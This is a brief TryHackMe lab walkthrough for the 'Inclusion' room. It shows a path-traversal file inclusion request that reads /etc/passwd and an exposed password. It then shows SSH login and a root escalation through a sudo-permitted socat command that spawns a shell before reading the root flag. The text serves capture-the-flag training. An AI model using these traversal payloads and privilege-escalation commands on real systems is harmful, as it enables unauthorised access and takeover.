LFI Inclusion TryHackMe Walkthrough
Move up the dir untill you access the /etc/passwd file{http://ip/article?name=../../../etc/passwd}
/bin/falsefalconfeast:x:1000:1000:falconfeast,,,:/home/falconfeast:/bin/bash#falconfeast:rootpasswordsshd:x:110:65534::/run/sshd:/usr/sbin/nologinmysql:x:111:116:MySQL Server,,,:/nonexistent:/bin/false
With the uname:password “#” in the file, login, ssh, as the service was running(from the nmap scan)
User {Flag}
see what we can run as “sudo”
Just google “(root) NOPASSWD: /usr/bin/socat” then gtfobins is an excellent resource for exploiting unix binaries.
sudo :)
falconfeast@inclusion:~$ sudo socat stdin exec:/bin/sh
id
uid=0(root) gid=0(root) groups=0(root)
whoami
root
Aint’ a proper shell…trying to spawn….
python -c ‘import pty; pty.spawn(“/bin/bash”)’
bash: line 2: python: command not found
*no python interpreter installed
We can just navigate the dir as root as look for our flag
whoami
root
cat /root/root.txt
{flag}
